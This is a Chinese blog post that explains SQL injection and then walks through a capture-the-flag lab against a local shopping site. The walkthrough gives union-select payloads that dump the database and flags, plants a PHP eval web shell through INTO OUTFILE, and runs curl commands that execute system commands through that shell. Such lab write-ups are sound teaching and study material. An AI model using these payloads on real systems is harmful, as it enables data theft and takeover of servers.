首页 > 其他分享 >web安全

web安全

时间:2023-11-01 23:45:09浏览次数:31  
标签:12.39 web http 数据库 192.168 安全 SQL php

 

所谓 SQL 注入,就是通过把 SQL 命令插入到 Web 表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的 SQL 语句。具体来说,它是利用现有应用程序,将 SQL 语句注入到后台数据库引擎执行的能 力,它可以通过在 Web 表单中输入 SQL 语句得到一个存在安全漏洞的网站上的数据,而不是按照设计者意图去执 行 SQL 语句。

(1)SQL 注入漏洞原理

SQL 注入攻击指的是通过构建特殊的输入作为参数传入 Web 应用程序,而这些输入大都是 SQL 语法里的一些组合,通过执行 SQL 语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。

根据相关技术原理,SQL 注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。基于此,SQL 注入的产生原因通常表现在以下几方面:不当的类型处理;不安全的数据库配置;不合理的查询集处理;不当的错误处理;转义字符处理不合适;多个提交处理不当。

(2)SQL 注入漏洞对于数据安全的影响

数据库信息泄漏:数据库中存放的用户的隐私信息的泄露。

网页篡改:通过操作数据库对特定网页进行篡改。

网站被挂马,传播恶意软件:修改数据库一些字段的值,嵌入网马链接,进行挂马攻击。

数据库被恶意操作:数据库服务器被攻击,数据库的系统管理员帐户被篡改。

服务器被远程控制,被安装后门。经由数据库服务器提供的操作系统支持,让黑客得以修改或控制操作系统。

破坏硬盘数据,瘫痪全系统。

一些类型的数据库系统能够让 SQL 指令操作文件系统,这使得 SQL 注入的危害被进一步放大。

 

在 kali 中打开终端使用命令 nmap -sS -n 192.168.12.39,扫描目标服务器的端口开放情况。

 

 

 

使用浏览器访问目标地址 192.168.12.39,打开页面之后是一个轻量级购物网站

 

 

 

 

任意点击一个商品,发现 url 中有可能使用 id 的数值查询数据库内容。

 

测试是否存在 SQL 注入,当 url 的最后添加一个单引号时页面内容会发生变化,说明可能存在 SQL 注入。

 

经过测试,查询有 6 列:当输入 http://192.168.12.39/product.php?id=12’ order by 6%23 时,页面正常显示。

当输入 http://192.168.12.39/product.php?id=12’ order by 7%23 时,页面为

 

 

 

访问 http://192.168.12.39/product.php?id=12' union select 11,22,33,44,55,66%23 得到页面上的显示位如

 

 

使用如下 payload,http://192.168.12.39/product.php?id=12' union select 11,22,(select group_concat(schema_name) from information_schema.schemata),44,55,66'%23 获取当前数据库中所有数据库名。

 

发现存在 flag 数据库,然后获取 flag 数据库的表名 http://192.168.12.39/product.php?id=12' union select 11,22,(select group_concat(table_name)from information_schema.tables where table_schema="flag"),44,55,66'%23

 

从上面的结果中得知 flags 表中只有 flag 这一个字段。获取 flag 字段中的内容 http://192.168.12.39/product.php?id=12' union select 11,22,(select flag from flag.flags),44,55,66'%23

 

得到 flag1{d5290250eddba7db80805fda68753c79}。

尝试使用 SQL 注入导出文件来 getshell,访问 url:http://192.168.12.39/product.php?id=12' union select 11,22,'<?

php eval($_POST[cmd]);?>',44,55,66 into outfile '/var/www/html/shell.php'%23

 

 

注入完成后,页面没有任何显示,尝试访问 http://192.168.12.39/shell.php 文件。

 

打开终端在终端中使用 curl 命令进行 POST 传参,在 post 数据中尝试执行 ls 命令,curl -X POST --data”cmd= system(ls);” http://192.168.12.39/shell.php,结果中发现有一个 ffll 文件。

 

 

读取该文件 ffll 的内容,在 curl 命令中提交 post 数据,使用 cat 命令查了 ffll,curl -X POST --data”cmd=system(‘cat ffll’);” http://192.168.12.39/shell.php 得到第二个 flag

得出 flag 的值为 flag2{23dd605eaba7b4231ad04f796944b4c0}。

 

标签:12.39,web,http,数据库,192.168,安全,SQL,php
From: https://www.cnblogs.com/linjuan/p/17804418.html

相关文章

  • tesseract-wasm 基于webassembly 的tesseract npm 包
    tesseract是一个开源的ocr工具,社区提供可一个基于webassembly的tesseract-wasm,可以方便直接基于浏览器的ocr识别以下是一个简单的试用项目代码package.json {"name":"tesseract","version":"1.0.0","main":"index.js"......
  • 《信息安全系统设计与实现》第九周学习笔记
    一、第五章定时器及时钟服务1、并行计算是一种计算方案,它尝试使用多个执行并行算法的处理器更快速的解决问题顺序算法与并行算法并行性与并发性并行算法只识别可并行执行的任务。CPU系统中,并发性是通过多任务处理来实现的2、线程线程的原理:某进程同一地址空间上的独立......
  • javaweb--resultMap
    resultMap可以灵活的实现数据库列名和java类中的属性名的映射 1、定义<resultMap>标签2、在<select>标签中,使用resultMap属性替换resultType属性 ......
  • 16、Linux安全加固
    Linux安全加固目录Linux安全加固1、账号和口令2、服务、端口3、文件系统4、日志5、内核漏洞6、其他7、等保测评Linux测评命令安全加固思路账户安全->密码策略->当前开放的服务是否存在高危服务->排查当前的系统中是否存在内核漏洞->排查主机所在信息系统所对应的管理制......
  • 智能安全帽功能介绍_实时对讲/视频通话/RTK定位/气体检测
    智能安全帽是一款具备工业级高清晰度摄像头和4G/WIFI网络功能的创新产品。在传统安全帽的基础上,智能安全帽集成了摄像头、语音和通信主板等模块,提供高清视频采集、语音通讯、对讲和本地视频存储等功能。通过这种穿戴式设备,不仅可以实现数据采集和实时通信,还能真正解放现场操作......
  • 有哪些安全攻击?
    有哪些安全攻击?网络安全攻击主要分为两种类型,被动攻击和主动攻击被动攻击被动攻击是指攻击者从网络上窃听他人的通信内容,通常把这类攻击称为截获,被动攻击主要有两种形式:消息内容泄露攻击和流量分析攻击。由于攻击者没有修改数据,使得这种攻击很难被检测到。主动攻击直接对现有的数据......
  • 水库大坝可视化智能远程监管方案,助力安全监测智能巡检
    一、背景需求水库大坝作为防洪度汛的重要设施,其安全问题直接关系到人民群众的生命财产安全。因此,必须加强对大坝水库的安全管理,对水库除险加固和运行管护要消除存量隐患,实现常态化管理,同时要配套完善重点小型水库雨水情和安全监测设施,实现水库安全鉴定和除险加固常态化。二、方案设......
  • 如何在 Web 前端做 3D 音效处理
     一、背景在社交元宇宙、大逃杀等类型的游戏场景下,用户在通过简单语音交流外,结合场景也需要一些立体声效果来让用户感知游戏角色周围其他用户的存在及其对应的距离和方位,提高语音互动的趣味性。为了满足上述需求 ZEGOExpressWebSDK 从 v2.10.0(Native为v2.11.0)开始加入范......
  • 轧钢厂安全生产方案:AI视频识别安全风险智能监管平台的设计
    一、背景与需求轧钢厂一般都使用打包机对线材进行打包作业,由于生产需要,人员需频繁进入打包机内作业,如:加护垫、整包、打包机检修、调试等作业。在轧钢厂生产过程中,每个班次生产线材超过300件,人员在一个班次内(12h)就要进入打包机区域300次以上。如果员工安全意识淡薄,违反岗位安全操......
  • 某汽车金融企业:搭建SDLC安全体系,打造智慧金融服务样本
    某汽车金融企业是国内头部汽车金融公司,已经为超过数百万名客户提供专业的汽车金融服务。该公司通过近几年的数字化创新,在提升客户体验、提高管理效率、降低经营成本等方面已具备很强的服务能力,让客户获得更方便、更快捷、更灵活的金融服务。发力线上汽车金融服务,以数字化激活内生动......